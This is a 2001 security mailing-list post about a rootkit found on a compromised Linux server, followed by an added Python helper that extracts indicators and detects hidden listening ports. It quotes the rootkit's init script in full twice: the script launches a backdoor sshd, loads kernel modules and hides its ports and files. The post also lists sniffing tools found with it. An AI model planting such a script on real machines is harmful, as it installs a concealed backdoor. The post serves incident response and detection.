Security Incidents mailing list archives

Cracked. Possible(?) new rootkit ?


From: maarten van den Berg <maarten () VBVB NL>
Date: Wed, 14 Feb 2001 16:21:17 +0100

Hi

Maybe I'm mistaken and this is old stuff, but...

I recently found a box which was obviously cracked, at least all the
evidence definitely points that way...:


After a (kernel-)upgrade, some service led to crashing the whole machine.
The service in question was called "system", and this is what
/etc/rc.d/rc3.d/S99system looks like:

_____ cut here ______
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.

/var/kerb/ssh.d > /dev/null 2> /dev/null

/sbin/insmod -f /var/kerb/supernw.o > /dev/null 2> /dev/null
/sbin/insmod -f /var/kerb/supermd.o > /dev/null 2> /dev/null

/bin/kill -31 `/var/kerb/pidof ssh.d` > /dev/null 2> /dev/null

#exec redir
#/var/kerb/ered /usr/sbin/in.ftpd /usr/bin/in.ftpd

/var/kerb/nethide ":1F98" > /dev/null 2> /dev/null
/var/kerb/nethide ":1F91" > /dev/null 2> /dev/null
/var/kerb/nethide ":1F92" > /dev/null 2> /dev/null

#/var/kerb/hidef /usr/bin/in.ftpd > /dev/null 2> /dev/null

/var/kerb/hidef /var/kerb > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/ered > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/nethide > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/pidof > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/rexec > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/ssh.d > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/k.a > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/sd.a > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/supernw.o > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/supermd.o > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/p > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/l > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/s > /dev/null 2> /dev/null

/var/kerb/hidef /etc/rc.d/rc3.d/S99system > /dev/null 2> /dev/null
/var/kerb/hidef /etc/rc.d/rc5.d/S99system > /dev/null 2> /dev/null

/var/kerb/hidef /var/kerb/hidef > /dev/null 2> /dev/null

_____ cut here _____

Judging just from the file, an alternative sshd (ssh.d) is started, two
kernel-modules are inserted, a binary hides certain strings in something
network-related, and a binary 'hidef' hides everything including itself.

I have not had time yet to do any more research, but I bet it was just
pure luck that this toolkit didn't function well under a new kernel, thus
exposing itself...  I know what to do now, reinstall from scratch, but I
was wondering whether this is interesting stuff for the list, or whether it is
merely the Nth+1 crack of a Redhat box (not MY favorite flavour, btw) with
a well-known rootkit etc.

Oh, and by the way: Before discovery, I ran chkrootkit v 0.19, but that
didn't detect anything, running or otherwise.


Maarten


_____ Listing of /var/kerb/ _____


drwxr-xr-x root/ftp          0 2000-07-27 21:40:46 kerb/
drwxr-xr-x root/root         0 2000-07-12 03:43:50 kerb/s/
-rwxr-xr-x root/root    129076 2000-07-12 03:20:11 kerb/s/dsniff
-rwxr-xr-x root/root     20100 2000-07-12 03:20:16 kerb/s/arpredirect
-rw-r--r-- root/root      1009 2000-07-12 03:43:50 kerb/s/dsniff.services
-rwxr-xr-x root/root     93580 2000-07-12 03:26:17 kerb/s/urlsnarf
-rwxr-xr-x root/ftp      13468 2000-07-12 08:29:59 kerb/ered
-rwxr-xr-x root/ftp       3984 2000-07-12 08:29:59 kerb/hidef
-rw-r--r-- root/ftp        537 2000-07-12 08:29:59 kerb/k.a
-rwxr-xr-x root/ftp      35016 2000-07-12 08:29:59 kerb/l
-rwxr-xr-x root/ftp      13036 2000-07-12 08:29:59 kerb/nethide
-rwxr-xr-x root/ftp      27896 2000-07-12 08:29:59 kerb/p
-rwxr-xr-x root/ftp       8128 2000-07-12 08:29:59 kerb/pidof
-rw------- root/ftp        512 2001-02-14 16:01:40 kerb/sd.a
-rwxr-xr-x root/ftp     196408 2000-07-12 08:29:59 kerb/ssh.d
-rw-r--r-- root/ftp        960 2000-07-12 08:29:59 kerb/supermd.o
-rw-r--r-- root/ftp      12292 2000-07-12 08:29:59 kerb/supernw.o

_____ end of listing _____
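An added triage helper, written for this archive page and not part of Maarten's post or of any rootkit analysis tool: it parses an rc script of the kind quoted above and extracts the indicators a responder wants to record (kernel modules loaded with insmod, paths passed to hidef, and the ":1F98"-style strings given to nethide, which are hexadecimal port numbers in the format /proc/net/tcp uses, so ":1F98" is TCP port 8088). It also shows the cross-check that a nethide-style hook defeats in userland: listening sockets present in /proc/net/tcp but absent from what a (possibly trojaned) netstat reports. The embedded rc script is the S99system content from the post with its comment and blank lines trimmed; the /proc/net/tcp sample is constructed for the example.

```python
import re

# S99system as quoted in the post, with blank and explanatory comment lines removed.
RC_SCRIPT = """\
#!/bin/sh
/var/kerb/ssh.d > /dev/null 2> /dev/null
/sbin/insmod -f /var/kerb/supernw.o > /dev/null 2> /dev/null
/sbin/insmod -f /var/kerb/supermd.o > /dev/null 2> /dev/null
/bin/kill -31 `/var/kerb/pidof ssh.d` > /dev/null 2> /dev/null
#/var/kerb/ered /usr/sbin/in.ftpd /usr/bin/in.ftpd
/var/kerb/nethide ":1F98" > /dev/null 2> /dev/null
/var/kerb/nethide ":1F91" > /dev/null 2> /dev/null
/var/kerb/nethide ":1F92" > /dev/null 2> /dev/null
#/var/kerb/hidef /usr/bin/in.ftpd > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/ered > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/nethide > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/pidof > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/rexec > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/ssh.d > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/k.a > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/sd.a > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/supernw.o > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/supermd.o > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/p > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/l > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/s > /dev/null 2> /dev/null
/var/kerb/hidef /etc/rc.d/rc3.d/S99system > /dev/null 2> /dev/null
/var/kerb/hidef /etc/rc.d/rc5.d/S99system > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/hidef > /dev/null 2> /dev/null
"""

# Constructed /proc/net/tcp sample: sshd on 22, two listeners on the ports the
# script tries to hide, and one established connection. Fields are hexadecimal.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 00000000 300 0 0 2 -1
   1: 00000000:1F98 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1235 1 00000000 300 0 0 2 -1
   2: 00000000:1F91 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1236 1 00000000 300 0 0 2 -1
   3: 0100007F:0050 0100007F:C000 01 00000000:00000000 00:00000000 00000000     0        0 1237 1 00000000 20 0 0 2 -1
"""

PORT_PATTERN = re.compile(r":([0-9A-Fa-f]{4})")


def proc_port(token):
    """Decode a ':1F98'-style /proc/net/tcp port suffix into a decimal port."""
    m = PORT_PATTERN.search(token)
    if not m:
        raise ValueError("no hexadecimal port in %r" % token)
    return int(m.group(1), 16)


def parse_rc_script(text):
    """Collect indicators from an rc script: every command run, modules passed
    to insmod, paths passed to hidef, and nethide patterns as decimal ports."""
    found = {"executed": [], "modules": [], "nethide_ports": [], "hidden_paths": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                       # comments and blank lines carry no action
        args = []
        for tok in line.split():
            if tok.startswith(">") or tok == "2>":
                break                      # everything after the first redirection is noise
            args.append(tok)
        cmd = args[0]
        found["executed"].append(cmd)
        if cmd.endswith("/insmod"):
            found["modules"].extend(a for a in args[1:] if a.endswith(".o"))
        elif cmd.endswith("/nethide"):
            found["nethide_ports"].append(proc_port(args[1].strip("\"'")))
        elif cmd.endswith("/hidef"):
            found["hidden_paths"].append(args[1])
    return found


def hidden_listeners(proc_net_tcp, reported_ports):
    """Ports in LISTEN state (st == 0A) in /proc/net/tcp that a userland tool's
    report omits; a hooked netstat produces exactly this discrepancy."""
    listening = set()
    for line in proc_net_tcp.splitlines()[1:]:   # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        local_addr, state = fields[1], fields[3]
        if state == "0A":
            listening.add(proc_port(local_addr))
    return listening - set(reported_ports)


if __name__ == "__main__":
    for key, values in parse_rc_script(RC_SCRIPT).items():
        print(key, values)
    # Pretend a trojaned netstat only admitted to port 22.
    print("listeners missing from netstat:", sorted(hidden_listeners(SAMPLE_PROC_NET_TCP, {22})))
```

On a live system the same hooks that patch netstat may also filter /proc itself, so this comparison is only trustworthy when /proc/net/tcp comes from a clean kernel (a rescue boot, or a capture taken before the modules loaded) or when the "reported" side comes from a statically linked tool on read-only media; for a box like the one described, the output is evidence to keep, not a reason to skip the reinstall.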

